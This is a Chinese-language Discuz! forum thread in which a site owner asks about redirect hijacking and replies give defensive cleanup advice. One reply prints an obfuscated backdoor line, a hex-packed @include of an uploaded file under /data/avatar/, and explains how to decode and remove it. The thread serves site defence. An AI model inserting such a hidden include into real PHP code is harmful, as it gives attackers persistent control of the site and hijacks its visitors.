本帖最后由 zhucedis 于 2020-8-8 12:08 編輯 求大神指點下這到底是怎么回事,如何解決!謝謝 感謝大神:allthebest 的指點 非常感謝 查看全文
若存在,處理前,先卸載所有盜版插件與模版。 進discuz后臺找到工具-文件校驗,看下最近有哪些php文件被修改了。 1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。 2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT'] (排查一般用WEBshell后門掃描軟件掃描核查?。?br /> 如果有就刪除此段代碼。并把該段代碼進行解密。 舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30')); 需要解密的代碼為:2F646174612F6176617461722F30 解密后為:/data/avatar/0 代碼解密地址:http://www.bejson.com/convert/ox2str/ 意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。 解決辦法:刪除上面的代碼和文件即可。 掛馬問題解決了后,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復雜一點。 |
一般是被掛馬了 盡快清理 作好服務(wù)器安全哦 |
是不是安裝盜版的插件了,你dz有病毒了,可以考慮一下安裝安全插件:https://addon.dismall.com/plugins/nayuan_safe.html, 需要清理病毒的話,可以加我QQ276440802 |
手機版|小黑屋|Discuz! 官方交流社區(qū)
( 皖I(lǐng)CP備16010102號 |皖公網(wǎng)安備34010302002376號 )|網(wǎng)站地圖|
GMT+8, 2025-10-21 07:59 , Processed in 0.049228 second(s), 14 queries , Redis On.
Powered by Discuz! X5.0 Licensed
© 2001-2025 Discuz! Team.